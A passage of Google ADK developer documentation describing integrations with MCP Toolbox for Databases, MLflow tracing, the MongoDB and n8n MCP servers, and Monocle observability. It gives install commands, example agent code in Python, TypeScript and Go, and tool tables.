| `list_project_labels`  | List project labels          |
| `list_teams`           | List teams                   |
| `get_team`             | Get a team                   |
| `list_users`           | List users                   |
| `get_user`             | Get a user                   |
| `search_documentation` | Search documentation         |

## Additional resources

- [Linear MCP Server Documentation](https://linear.app/docs/mcp)
- [Linear Getting Started Guide](https://linear.app/docs/start-guide)

# MCP Toolbox for Databases tool for ADK

Supported in ADK: Python, TypeScript, Go

[MCP Toolbox for Databases](https://github.com/googleapis/genai-toolbox) is an open source MCP server for databases. It is designed for enterprise-grade, production-quality use. It lets you develop tools more easily, quickly, and securely by handling complexities such as connection pooling and authentication.

Google’s Agent Development Kit (ADK) has built-in support for MCP Toolbox. For more information on [getting started](https://googleapis.github.io/genai-toolbox/getting-started/) or [configuring](https://googleapis.github.io/genai-toolbox/getting-started/configure/) MCP Toolbox, see the [documentation](https://googleapis.github.io/genai-toolbox/getting-started/introduction/).
## Supported Data Sources MCP Toolbox provides out-of-the-box toolsets for the following databases and data platforms: ### Google Cloud - [BigQuery](https://googleapis.github.io/genai-toolbox/resources/sources/bigquery/) (including tools for SQL execution, schema discovery, and AI-powered time series forecasting) - [AlloyDB](https://googleapis.github.io/genai-toolbox/resources/sources/alloydb-pg/) (PostgreSQL-compatible, with tools for both standard queries and natural language queries) - [AlloyDB Admin](https://googleapis.github.io/genai-toolbox/resources/sources/alloydb-admin/) - [Spanner](https://googleapis.github.io/genai-toolbox/resources/sources/spanner/) (supporting both GoogleSQL and PostgreSQL dialects) - Cloud SQL (with dedicated support for [Cloud SQL for PostgreSQL](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-sql-pg/), [Cloud SQL for MySQL](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-sql-mysql/), and [Cloud SQL for SQL Server](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-sql-mssql/)) - [Cloud SQL Admin](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-sql-admin/) - [Firestore](https://googleapis.github.io/genai-toolbox/resources/sources/firestore/) - [Bigtable](https://googleapis.github.io/genai-toolbox/resources/sources/bigtable/) - [Dataplex](https://googleapis.github.io/genai-toolbox/resources/sources/dataplex/) (for data discovery and metadata search) - [Cloud Monitoring](https://googleapis.github.io/genai-toolbox/resources/sources/cloud-monitoring/) ### Relational & SQL Databases - [PostgreSQL](https://googleapis.github.io/genai-toolbox/resources/sources/postgres/) (generic) - [MySQL](https://googleapis.github.io/genai-toolbox/resources/sources/mysql/) (generic) - [Microsoft SQL Server](https://googleapis.github.io/genai-toolbox/resources/sources/mssql/) (generic) - [ClickHouse](https://googleapis.github.io/genai-toolbox/resources/sources/clickhouse/) - 
[TiDB](https://googleapis.github.io/genai-toolbox/resources/sources/tidb/) - [OceanBase](https://googleapis.github.io/genai-toolbox/resources/sources/oceanbase/) - [Firebird](https://googleapis.github.io/genai-toolbox/resources/sources/firebird/) - [SQLite](https://googleapis.github.io/genai-toolbox/resources/sources/sqlite/) - [YugabyteDB](https://googleapis.github.io/genai-toolbox/resources/sources/yugabytedb/) ### NoSQL & Key-Value Stores - [MongoDB](https://googleapis.github.io/genai-toolbox/resources/sources/mongodb/) - [Couchbase](https://googleapis.github.io/genai-toolbox/resources/sources/couchbase/) - [Redis](https://googleapis.github.io/genai-toolbox/resources/sources/redis/) - [Valkey](https://googleapis.github.io/genai-toolbox/resources/sources/valkey/) - [Cassandra](https://googleapis.github.io/genai-toolbox/resources/sources/cassandra/) ### Graph Databases - [Neo4j](https://googleapis.github.io/genai-toolbox/resources/sources/neo4j/) (with tools for Cypher queries and schema inspection) - [Dgraph](https://googleapis.github.io/genai-toolbox/resources/sources/dgraph/) ### Data Platforms & Federation - [Looker](https://googleapis.github.io/genai-toolbox/resources/sources/looker/) (for running Looks, queries, and building dashboards via the Looker API) - [Trino](https://googleapis.github.io/genai-toolbox/resources/sources/trino/) (for running federated queries across multiple sources) ### Other - [HTTP](https://googleapis.github.io/genai-toolbox/resources/sources/http/) ## Configure and deploy MCP Toolbox is an open source server that you deploy and manage yourself. 
For more instructions on deploying and configuring, see the official Toolbox documentation: - [Installing the Server](https://googleapis.github.io/genai-toolbox/getting-started/introduction/#installing-the-server) - [Configuring MCP Toolbox](https://googleapis.github.io/genai-toolbox/getting-started/configure/) ## Install Client SDK for ADK ADK relies on the `toolbox-adk` python package to use MCP Toolbox. Install the package before getting started: ```shell pip install google-adk[toolbox] ``` ### Loading MCP Toolbox Tools Once your MCP Toolbox server is configured, up and running, you can load tools from your server using ADK: ```python from google.adk import Agent from google.adk.tools.toolbox_toolset import ToolboxToolset toolset = ToolboxToolset( server_url="http://127.0.0.1:5000" ) root_agent = Agent( ..., tools=[toolset] # Provide the toolset to the Agent ) ``` ### Authentication The `ToolboxToolset` supports various authentication strategies including Workload Identity (ADC), User Identity (OAuth2), and API Keys. For full documentation, see the [MCP Toolbox ADK Authentication Guide](https://github.com/googleapis/mcp-toolbox-sdk-python/tree/main/packages/toolbox-adk#authentication). **Example: Workload Identity (ADC)** Recommended for Cloud Run, GKE, or local development with `gcloud auth login`. ```python from google.adk.tools.toolbox_toolset import ToolboxToolset from toolbox_adk import CredentialStrategy # target_audience: The URL of your MCP Toolbox server creds = CredentialStrategy.workload_identity(target_audience="") toolset = ToolboxToolset( server_url="", credentials=creds ) ``` ### Advanced Configuration You can configure parameter binding and additional headers. See the [MCP Toolbox ADK documentation](https://github.com/googleapis/mcp-toolbox-sdk-python/tree/main/packages/toolbox-adk) for details. For example, you can bind values to tool parameters. Note These values are hidden from the model. 
```python toolset = ToolboxToolset( server_url="...", bound_params={ "region": "us-central1", "api_key": lambda: get_api_key() # Can be a callable } ) ``` ADK relies on the `@toolbox-sdk/adk` TS package to use MCP Toolbox. Install the package before getting started: ```shell npm install @toolbox-sdk/adk ``` ### Loading MCP Toolbox Tools Once your MCP Toolbox server is configured and up and running, you can load tools from your server using ADK: ```typescript import {InMemoryRunner, LlmAgent} from '@google/adk'; import {Content} from '@google/genai'; import {ToolboxClient} from '@toolbox-sdk/adk' const toolboxClient = new ToolboxClient("http://127.0.0.1:5000"); const loadedTools = await toolboxClient.loadToolset(); export const rootAgent = new LlmAgent({ name: 'weather_time_agent', model: 'gemini-2.5-flash', description: 'Agent to answer questions about the time and weather in a city.', instruction: 'You are a helpful agent who can answer user questions about the time and weather in a city.', tools: loadedTools, }); async function main() { const userId = 'test_user'; const appName = rootAgent.name; const runner = new InMemoryRunner({agent: rootAgent, appName}); const session = await runner.sessionService.createSession({ appName, userId, }); const prompt = 'What is the weather in New York? And the time?'; const content: Content = { role: 'user', parts: [{text: prompt}], }; console.log(content); for await (const e of runner.runAsync({ userId, sessionId: session.id, newMessage: content, })) { if (e.content?.parts?.[0]?.text) { console.log(`${e.author}: ${JSON.stringify(e.content, null, 2)}`); } } } main().catch(console.error); ``` ADK relies on the `mcp-toolbox-sdk-go` go module to use MCP Toolbox. 
Install the module before getting started:

```shell
go get github.com/googleapis/mcp-toolbox-sdk-go
```

### Loading MCP Toolbox Tools

Once your MCP Toolbox server is configured and up and running, you can load tools from your server using ADK:

```go
package main

import (
	"context"
	"log"

	"github.com/googleapis/mcp-toolbox-sdk-go/tbadk"
	"google.golang.org/adk/agent/llmagent"
	"google.golang.org/adk/tool"
)

func main() {
	ctx := context.Background()

	toolboxClient, err := tbadk.NewToolboxClient("http://127.0.0.1:5000")
	if err != nil {
		log.Fatalf("Failed to create MCP Toolbox client: %v", err)
	}

	// Load a specific set of tools
	toolboxtools, err := toolboxClient.LoadToolset("my-toolset-name", ctx)
	if err != nil {
		log.Fatalf("Could not load MCP Toolbox Toolset: %v", err)
	}

	// Convert the loaded tools into the []tool.Tool slice expected by the agent config
	toolsList := make([]tool.Tool, len(toolboxtools))
	for i := range toolboxtools {
		toolsList[i] = &toolboxtools[i]
	}

	toolsetAgent, err := llmagent.New(llmagent.Config{
		// ...
		Tools: toolsList,
	})
	if err != nil {
		log.Fatalf("Could not create agent: %v", err)
	}
	_ = toolsetAgent

	// Load a single tool
	toolboxtool, err := toolboxClient.LoadTool("my-tool-name", ctx)
	if err != nil {
		log.Fatalf("Could not load MCP Toolbox Tool: %v", err)
	}

	singleToolAgent, err := llmagent.New(llmagent.Config{
		// ...
		Tools: []tool.Tool{&toolboxtool},
	})
	if err != nil {
		log.Fatalf("Could not create agent: %v", err)
	}
	_ = singleToolAgent
}
```

## Advanced MCP Toolbox Features

MCP Toolbox has a variety of features that make it easier to develop Gen AI tools for databases.
For more information, read about the following features:

- [Authenticated Parameters](https://googleapis.github.io/genai-toolbox/resources/tools/#authenticated-parameters): bind tool inputs to values from OIDC tokens automatically, making it easy to run sensitive queries without potentially leaking data
- [Authorized Invocations](https://googleapis.github.io/genai-toolbox/resources/tools/#authorized-invocations): restrict access to a tool based on the user's auth token
- [OpenTelemetry](https://googleapis.github.io/genai-toolbox/how-to/export_telemetry/): get metrics and tracing from Toolbox with OpenTelemetry

# MLflow observability for ADK

Supported in ADK: Python

[MLflow Tracing](https://mlflow.org/docs/latest/genai/tracing/) provides first-class support for ingesting OpenTelemetry (OTel) traces. Google ADK emits OTel spans for agent runs, tool calls, and model requests, which you can send directly to an MLflow Tracking Server for analysis and debugging.

## Prerequisites

- MLflow version 3.6.0 or newer. OpenTelemetry ingestion is only supported in MLflow 3.6.0+.
- A SQL-based backend store (e.g., SQLite, PostgreSQL, MySQL). File-based stores do not support OTLP ingestion.
- Google ADK installed in your environment.

## Install dependencies

```bash
pip install "mlflow>=3.6.0" google-adk opentelemetry-sdk opentelemetry-exporter-otlp-proto-http
```

## Start the MLflow Tracking Server

Start MLflow with a SQL backend and a port (5000 in this example):

```bash
mlflow server --backend-store-uri sqlite:///mlflow.db --port 5000
```

You can point `--backend-store-uri` to other SQL backends (PostgreSQL, MySQL, MSSQL). OTLP ingestion is not supported with file-based backends.

## Configure OpenTelemetry (required)

You must configure an OTLP exporter and set a global tracer provider before using any ADK components so that spans are emitted to MLflow.
Initialize the OTLP exporter and global tracer provider in code before importing or constructing ADK agents/tools: ```python # my_agent/agent.py from opentelemetry import trace from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter from opentelemetry.sdk.trace import TracerProvider from opentelemetry.sdk.trace.export import SimpleSpanProcessor exporter = OTLPSpanExporter( endpoint="http://localhost:5000/v1/traces", headers={"x-mlflow-experiment-id": "123"} # replace with your experiment id ) provider = TracerProvider() provider.add_span_processor(SimpleSpanProcessor(exporter)) trace.set_tracer_provider(provider) # set BEFORE importing/using ADK ``` This configures the OpenTelemetry pipeline and sends ADK spans to the MLflow server on each run. ## Example: Trace an ADK agent Now you can add the agent code for a simple math agent, after the code that sets up the OTLP exporter and tracer provider: ```python # my_agent/agent.py from google.adk.agents import LlmAgent from google.adk.tools import FunctionTool def calculator(a: float, b: float) -> str: """Add two numbers and return the result.""" return str(a + b) calculator_tool = FunctionTool(func=calculator) root_agent = LlmAgent( name="MathAgent", model="gemini-2.0-flash-exp", instruction=( "You are a helpful assistant that can do math. " "When asked a math problem, use the calculator tool to solve it." ), tools=[calculator_tool], ) ``` Run the agent with: ```bash adk run my_agent ``` And ask it a math problem: ```console What is 12 + 34? ``` You should then see output similar to: ```console [MathAgent]: The answer is 46. ``` ## View traces in MLflow Open the MLflow UI at `http://localhost:5000`, select your experiment, and inspect the trace tree and spans generated by your ADK agent. ## Tips - Set the tracer provider before importing or initializing ADK objects so all spans are captured. - Behind a proxy or on a remote host, replace `localhost:5000` with your server address. 
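
When the MLflow server is not on `localhost`, the exporter endpoint and experiment header need to be derived from your own server address. The following is a minimal sketch of that derivation using only the standard library. The helper name `otlp_exporter_settings` is hypothetical, and the `/v1/traces` path and `x-mlflow-experiment-id` header are taken from the exporter configuration shown earlier in this section.

```python
def otlp_exporter_settings(server_url, experiment_id):
    """Return (endpoint, headers) suitable for an OTLP span exporter.

    server_url is the base address of the MLflow Tracking Server;
    a trailing slash is tolerated.
    """
    endpoint = server_url.rstrip("/") + "/v1/traces"
    headers = {"x-mlflow-experiment-id": str(experiment_id)}
    return endpoint, headers


endpoint, headers = otlp_exporter_settings("http://localhost:5000", 123)
print(endpoint)  # http://localhost:5000/v1/traces
```

The resulting values can be passed as the `endpoint` and `headers` arguments of `OTLPSpanExporter`.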
## Resources

- [MLflow Tracing Documentation](https://mlflow.org/docs/latest/genai/tracing/): Official documentation for MLflow Tracing that covers other library integrations and downstream usage of traces, such as evaluation, monitoring, searching, and more.
- [OpenTelemetry in MLflow](https://mlflow.org/docs/latest/genai/tracing/opentelemetry/): Detailed guide on how to use OpenTelemetry with MLflow.
- [MLflow for Agents](https://mlflow.org/docs/latest/genai/): Comprehensive guide on how to use MLflow for building production-ready agents.

# MongoDB MCP tool for ADK

Supported in ADK: Python, TypeScript

The [MongoDB MCP Server](https://github.com/mongodb-js/mongodb-mcp-server) connects your ADK agent to [MongoDB](https://www.mongodb.com/) databases and MongoDB Atlas clusters. This integration gives your agent the ability to query collections, manage databases, and interact with MongoDB Atlas infrastructure using natural language.

## Use cases

- **Data Exploration and Analysis**: Query MongoDB collections using natural language, run aggregations, and analyze document schemas without writing complex queries manually.
- **Database Administration**: List databases and collections, create indexes, manage users, and monitor database statistics through conversational commands.
- **Atlas Infrastructure Management**: Create and manage MongoDB Atlas clusters, configure access lists, and view performance recommendations directly from your agent.
## Prerequisites

- **For database access**: A MongoDB connection string (local, self-hosted, or Atlas cluster)
- **For Atlas management**: A [MongoDB Atlas](https://www.mongodb.com/atlas) service account with API credentials (client ID and secret)

## Use with agent

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

# For database access, use a connection string:
CONNECTION_STRING = "mongodb://localhost:27017/myDatabase"

# For Atlas management, use API credentials:
# ATLAS_CLIENT_ID = "YOUR_ATLAS_CLIENT_ID"
# ATLAS_CLIENT_SECRET = "YOUR_ATLAS_CLIENT_SECRET"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="mongodb_agent",
    instruction="Help users query and manage MongoDB databases",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params=StdioServerParameters(
                    command="npx",
                    args=[
                        "-y",
                        "mongodb-mcp-server",
                        "--readOnly",  # Remove for write operations
                    ],
                    env={
                        # For database access, use:
                        "MDB_MCP_CONNECTION_STRING": CONNECTION_STRING,
                        # For Atlas management, use:
                        # "MDB_MCP_API_CLIENT_ID": ATLAS_CLIENT_ID,
                        # "MDB_MCP_API_CLIENT_SECRET": ATLAS_CLIENT_SECRET,
                    },
                ),
                timeout=30,
            ),
        )
    ],
)
```

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

// For database access, use a connection string:
const CONNECTION_STRING = "mongodb://localhost:27017/myDatabase";

// For Atlas management, use API credentials:
// const ATLAS_CLIENT_ID = "YOUR_ATLAS_CLIENT_ID";
// const ATLAS_CLIENT_SECRET = "YOUR_ATLAS_CLIENT_SECRET";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "mongodb_agent",
  instruction: "Help users query and manage MongoDB databases",
  tools: [
    new MCPToolset({
      type: "StdioConnectionParams",
      serverParams: {
        command: "npx",
        args: [
          "-y",
          "mongodb-mcp-server",
          "--readOnly", // Remove for write operations
        ],
        env: {
          // For database access, use:
          MDB_MCP_CONNECTION_STRING: CONNECTION_STRING,
          // For Atlas management, use:
          // MDB_MCP_API_CLIENT_ID: ATLAS_CLIENT_ID,
          // MDB_MCP_API_CLIENT_SECRET: ATLAS_CLIENT_SECRET,
        },
      },
    }),
  ],
});

export { rootAgent };
```

## Available tools

### MongoDB database tools

| Tool | Description |
| -------------------- | ----------------------------------------------- |
| `find` | Run a find query against a MongoDB collection |
| `aggregate` | Run an aggregation against a MongoDB collection |
| `count` | Get the number of documents in a collection |
| `list-databases` | List all databases for a MongoDB connection |
| `list-collections` | List all collections for a given database |
| `collection-schema` | Describe the schema for a collection |
| `collection-indexes` | Describe the indexes for a collection |
| `insert-many` | Insert documents into a collection |
| `update-many` | Update documents matching a filter |
| `delete-many` | Remove documents matching a filter |
| `create-collection` | Create a new collection |
| `drop-collection` | Remove a collection from the database |
| `drop-database` | Remove a database |
| `create-index` | Create an index for a collection |
| `drop-index` | Drop an index from a collection |
| `rename-collection` | Rename a collection |
| `db-stats` | Get statistics for a database |
| `explain` | Get query execution statistics |
| `export` | Export query results in EJSON format |

### MongoDB Atlas tools

**Note**: Atlas tools require API credentials. Set `MDB_MCP_API_CLIENT_ID` and `MDB_MCP_API_CLIENT_SECRET` environment variables to enable them.
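Rather than hard-coding credentials in the agent file, one option is to read them from the process environment and pass only the variables that are actually set. The following is a minimal sketch, not part of the MongoDB MCP Server or ADK: the helper name `build_mongodb_env` and its rule of requiring either a connection string or both Atlas credentials are assumptions made for illustration.

```python
import os
from typing import Dict, Mapping, Optional


def build_mongodb_env(source: Optional[Mapping[str, str]] = None) -> Dict[str, str]:
    """Collect the MongoDB MCP Server variables that are set in `source`.

    Hypothetical helper: `source` defaults to the current process environment.
    """
    source = os.environ if source is None else source
    names = (
        "MDB_MCP_CONNECTION_STRING",
        "MDB_MCP_API_CLIENT_ID",
        "MDB_MCP_API_CLIENT_SECRET",
    )
    # Keep only variables that are present and non-empty.
    env = {name: source[name] for name in names if source.get(name)}

    has_atlas = "MDB_MCP_API_CLIENT_ID" in env and "MDB_MCP_API_CLIENT_SECRET" in env
    # Assumed policy for this sketch: fail early if nothing usable is configured.
    if "MDB_MCP_CONNECTION_STRING" not in env and not has_atlas:
        raise ValueError("Set a connection string or both Atlas API credentials.")
    return env
```

The returned dictionary can then be passed as `env=build_mongodb_env()` to `StdioServerParameters` in place of the literal mapping shown earlier.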
| Tool | Description |
| ------------------------------- | -------------------------------- |
| `atlas-list-orgs` | List MongoDB Atlas organizations |
| `atlas-list-projects` | List MongoDB Atlas projects |
| `atlas-list-clusters` | List MongoDB Atlas clusters |
| `atlas-inspect-cluster` | Inspect metadata of a cluster |
| `atlas-list-db-users` | List database users |
| `atlas-create-free-cluster` | Create a free Atlas cluster |
| `atlas-create-project` | Create an Atlas project |
| `atlas-create-db-user` | Create a database user |
| `atlas-create-access-list` | Configure IP access list |
| `atlas-inspect-access-list` | View IP access list entries |
| `atlas-list-alerts` | List Atlas alerts |
| `atlas-get-performance-advisor` | Get performance recommendations |

## Configuration

### Environment variables

| Variable | Description |
| --------------------------- | --------------------------------------------- |
| `MDB_MCP_CONNECTION_STRING` | MongoDB connection string for database access |
| `MDB_MCP_API_CLIENT_ID` | Atlas API client ID for Atlas tools |
| `MDB_MCP_API_CLIENT_SECRET` | Atlas API client secret for Atlas tools |
| `MDB_MCP_READ_ONLY` | Enable read-only mode (`true` or `false`) |
| `MDB_MCP_DISABLED_TOOLS` | Comma-separated list of tools to disable |
| `MDB_MCP_LOG_PATH` | Directory for log files |

### Read-only mode

The `--readOnly` flag restricts the server to read, connect, and metadata operations only. This prevents any create, update, or delete operations, making it safe for data exploration without risk of accidental modifications.

### Disabling tools

You can disable specific tools or categories using `MDB_MCP_DISABLED_TOOLS`:

- Tool names: `find`, `aggregate`, `insert-many`, etc.
- Categories: `atlas` (all Atlas tools), `mongodb` (all database tools)
- Operation types: `create`, `update`, `delete`, `read`, `metadata`

## Additional resources

- [MongoDB MCP Server Repository](https://github.com/mongodb-js/mongodb-mcp-server)
- [MongoDB Documentation](https://www.mongodb.com/docs/)
- [MongoDB Atlas](https://www.mongodb.com/atlas)

# Monocle observability for ADK

Supported in ADK: Python

[Monocle](https://github.com/monocle2ai/monocle) is an open-source observability platform for monitoring, debugging, and improving LLM applications and AI Agents. It provides comprehensive tracing capabilities for your Google ADK applications through automatic instrumentation. Monocle generates OpenTelemetry-compatible traces that can be exported to various destinations including local files or console output.

## Overview

Monocle automatically instruments Google ADK applications, allowing you to:

- **Trace agent interactions** - Automatically capture every agent run, tool call, and model request with full context and metadata
- **Monitor execution flow** - Track agent state, delegation events, and execution flow through detailed traces
- **Debug issues** - Analyze detailed traces to quickly identify bottlenecks, failed tool calls, and unexpected agent behavior
- **Flexible export options** - Export traces to local files or console for analysis
- **OpenTelemetry compatible** - Generate standard OpenTelemetry traces that work with any OTLP-compatible backend

Monocle automatically instruments the following Google ADK components:

- **`BaseAgent.run_async`** - Captures agent execution, agent state, and delegation events
- **`FunctionTool.run_async`** - Captures tool execution, including tool name, parameters, and results
- **`Runner.run_async`** - Captures runner execution, including request context and execution flow

## Installation

### 1. Install Required Packages

```bash
pip install monocle_apptrace google-adk
```

## Setup

### 1. Configure Monocle Telemetry

Monocle automatically instruments Google ADK when you initialize telemetry. Call `setup_monocle_telemetry()` at the start of your application:

```python
from monocle_apptrace import setup_monocle_telemetry

# Initialize Monocle telemetry - automatically instruments Google ADK
setup_monocle_telemetry(workflow_name="my-adk-app")
```

That's it! Monocle will automatically detect and instrument your Google ADK agents, tools, and runners.

### 2. Configure Exporters (Optional)

By default, Monocle exports traces to local JSON files. You can configure different exporters using environment variables.

#### Export to Console (for debugging)

Set the environment variable:

```bash
export MONOCLE_EXPORTER="console"
```

#### Export to Local Files (default)

```bash
export MONOCLE_EXPORTER="file"
```

Or simply omit the `MONOCLE_EXPORTER` variable - it defaults to `file`.

## Observe

Now that tracing is set up, all Google ADK requests are automatically traced by Monocle.

```python
import asyncio

from monocle_apptrace import setup_monocle_telemetry
from google.adk.agents import Agent
from google.adk.runners import InMemoryRunner
from google.genai import types

# Initialize Monocle telemetry - must be called before using ADK
setup_monocle_telemetry(workflow_name="weather_app")


# Define a tool function
def get_weather(city: str) -> dict:
    """Retrieves the current weather report for a specified city.

    Args:
        city (str): The name of the city for which to retrieve the weather report.

    Returns:
        dict: status and result or error msg.
    """
    if city.lower() == "new york":
        return {
            "status": "success",
            "report": (
                "The weather in New York is sunny with a temperature of 25 degrees"
                " Celsius (77 degrees Fahrenheit)."
            ),
        }
    else:
        return {
            "status": "error",
            "error_message": f"Weather information for '{city}' is not available.",
        }


# Create an agent with tools
agent = Agent(
    name="weather_agent",
    model="gemini-2.0-flash-exp",
    description="Agent to answer questions using weather tools.",
    instruction="You must use the available tools to find an answer.",
    tools=[get_weather],
)

app_name = "weather_app"
user_id = "test_user"
session_id = "test_session"


async def main():
    runner = InMemoryRunner(agent=agent, app_name=app_name)
    session_service = runner.session_service

    await session_service.create_session(
        app_name=app_name,
        user_id=user_id,
        session_id=session_id,
    )

    # Run the agent (all interactions will be automatically traced)
    async for event in runner.run_async(
        user_id=user_id,
        session_id=session_id,
        new_message=types.Content(
            role="user",
            parts=[types.Part(text="What is the weather in New York?")],
        ),
    ):
        if event.is_final_response():
            print(event.content.parts[0].text.strip())


# Top-level `await` is not valid in a plain script, so run the coroutine explicitly.
# In a notebook, call `await main()` instead.
asyncio.run(main())
```

## Accessing Traces

By default, Monocle generates traces in JSON files in the local directory `./monocle`. The file name format is:

```text
monocle_trace_{workflow_name}_{trace_id}_{timestamp}.json
```

Each trace file contains an array of OpenTelemetry-compatible spans that capture:

- **Agent execution spans** - Agent state, delegation events, and execution flow
- **Tool execution spans** - Tool name, input parameters, and output results
- **LLM interaction spans** - Model calls, prompts, responses, and token usage (if using Gemini or other LLMs)

You can analyze these trace files using any OpenTelemetry-compatible tool or write custom analysis scripts.

## Visualizing Traces with VS Code Extension

The [Okahu Trace Visualizer](https://marketplace.visualstudio.com/items?itemName=OkahuAI.okahu-ai-observability) VS Code extension provides an interactive way to visualize and analyze Monocle-generated traces directly in Visual Studio Code.

### Installation

1. Open VS Code
1. Press `Ctrl+P` (or `Cmd+P` on Mac) to open Quick Open
1. Paste the following command and press Enter:

   ```text
   ext install OkahuAI.okahu-ai-observability
   ```

Alternatively, you can install it from the [VS Code Marketplace](https://marketplace.visualstudio.com/items?itemName=OkahuAI.okahu-ai-observability).

### Features

The extension provides:

- **Custom Activity Bar Panel** - Dedicated sidebar for trace file management
- **Interactive File Tree** - Browse and select trace files with custom React UI
- **Split View Analysis** - Gantt chart visualization alongside JSON data viewer
- **Real-time Communication** - Seamless data flow between VS Code and React components
- **VS Code Theming** - Fully integrated with VS Code's light/dark themes

### Usage

1. After running your ADK application with Monocle tracing enabled, trace files will be generated in the `./monocle` directory
1. Open the Okahu Trace Visualizer panel from the VS Code Activity Bar
1. Browse and select trace files from the interactive file tree
1. View your traces with:
   1. **Gantt chart visualization** - See the timeline and hierarchy of spans
   1. **JSON data viewer** - Inspect detailed span attributes and events
   1. **Token counts** - View token usage for LLM calls
   1. **Error badges** - Quickly identify failed operations

## What Gets Traced

Monocle automatically captures the following information from Google ADK:

- **Agent Execution**: Agent state, delegation events, and execution flow
- **Tool Calls**: Tool name, input parameters, and output results
- **Runner Execution**: Request context and overall execution flow
- **Timing Information**: Start time, end time, and duration for each operation
- **Error Information**: Exceptions and error states

All traces are generated in OpenTelemetry format, making them compatible with any OTLP-compatible observability backend.
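Because each trace file holds a JSON array of spans, a short script can summarize what was captured. The sketch below is illustrative only. It assumes each span is a JSON object with a `name` key, which is common in OpenTelemetry JSON exports but is not confirmed by this page, and the helper `summarize_traces` is a hypothetical name.

```python
import json
from collections import Counter
from pathlib import Path


def summarize_traces(trace_dir: str = "./monocle") -> Counter:
    """Count spans by name across all Monocle trace files in `trace_dir`.

    Assumption: every file contains a JSON array of span objects and each
    span carries a "name" key. Spans without one are grouped as "<unnamed>".
    """
    counts: Counter = Counter()
    for path in sorted(Path(trace_dir).glob("monocle_trace_*.json")):
        with path.open(encoding="utf-8") as f:
            spans = json.load(f)
        if not isinstance(spans, list):
            continue  # Skip files that do not match the assumed layout.
        for span in spans:
            if isinstance(span, dict):
                counts[span.get("name", "<unnamed>")] += 1
    return counts


if __name__ == "__main__":
    for name, count in summarize_traces().most_common():
        print(f"{count:5d}  {name}")
```

Inspect one generated file first and adjust the key names to match the spans your Monocle version actually writes.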
## Support and Resources

- [Monocle Documentation](https://docs.okahu.ai/monocle_overview/)
- [Monocle GitHub Repository](https://github.com/monocle2ai/monocle)
- [Google ADK Travel Agent Example](https://github.com/okahu-demos/adk-travel-agent)
- [Discord Community](https://discord.gg/D8vDbSUhJX)

# n8n MCP tool for ADK

Supported in ADK: Python, TypeScript

The [n8n MCP Server](https://docs.n8n.io/advanced-ai/accessing-n8n-mcp-server/) connects your ADK agent to [n8n](https://n8n.io/), an extendable workflow automation tool. This integration allows your agent to securely connect to an n8n instance to search, inspect, and trigger workflows directly from a natural language interface.

**Alternative: Workflow-level MCP Server**

The configuration guide on this page covers **Instance-level MCP access**, which connects your agent to a central hub of enabled workflows. Alternatively, you can use the [MCP Server Trigger node](https://docs.n8n.io/integrations/builtin/core-nodes/n8n-nodes-langchain.mcptrigger/) to make a **single workflow** act as its own standalone MCP server. This method is useful if you want to craft specific server behaviors or expose tools isolated to one workflow.

## Use cases

- **Execute Complex Workflows**: Trigger multi-step business processes defined in n8n directly from your agent, leveraging reliable branching logic, loops, and error handling to ensure consistency.
- **Connect to External Apps**: Access pre-built integrations through n8n without writing custom tools for each service, eliminating the need to manage API authentication, headers, or boilerplate code.
- **Data Processing**: Offload complex data transformation tasks to n8n workflows, such as converting natural language into API calls or scraping and summarizing webpages, utilizing custom Python or JavaScript nodes for precise data shaping.
## Prerequisites

- An active n8n instance
- MCP access enabled in settings
- A valid MCP access token

Refer to the [n8n MCP documentation](https://docs.n8n.io/advanced-ai/accessing-n8n-mcp-server/) for detailed setup instructions.

## Use with agent

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

N8N_INSTANCE_URL = "https://localhost:5678"
N8N_MCP_TOKEN = "YOUR_N8N_MCP_TOKEN"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="n8n_agent",
    instruction="Help users manage and execute workflows in n8n",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params=StdioServerParameters(
                    command="npx",
                    args=[
                        "-y",
                        "supergateway",
                        "--streamableHttp",
                        f"{N8N_INSTANCE_URL}/mcp-server/http",
                        "--header",
                        f"authorization:Bearer {N8N_MCP_TOKEN}",
                    ],
                ),
                timeout=300,
            ),
        )
    ],
)
```

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams

N8N_INSTANCE_URL = "https://localhost:5678"
N8N_MCP_TOKEN = "YOUR_N8N_MCP_TOKEN"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="n8n_agent",
    instruction="Help users manage and execute workflows in n8n",
    tools=[
        McpToolset(
            connection_params=StreamableHTTPServerParams(
                url=f"{N8N_INSTANCE_URL}/mcp-server/http",
                headers={
                    "Authorization": f"Bearer {N8N_MCP_TOKEN}",
                },
            ),
        )
    ],
)
```

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const N8N_INSTANCE_URL = "https://localhost:5678";
const N8N_MCP_TOKEN = "YOUR_N8N_MCP_TOKEN";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "n8n_agent",
  instruction: "Help users manage and execute workflows in n8n",
  tools: [
    new MCPToolset({
      type: "StdioConnectionParams",
      serverParams: {
        command: "npx",
        args: [
          "-y",
          "supergateway",
          "--streamableHttp",
          `${N8N_INSTANCE_URL}/mcp-server/http`,
          "--header",
          `authorization:Bearer ${N8N_MCP_TOKEN}`,
        ],
      },
    }),
  ],
});

export { rootAgent };
```

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const N8N_INSTANCE_URL = "https://localhost:5678";
const N8N_MCP_TOKEN = "YOUR_N8N_MCP_TOKEN";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "n8n_agent",
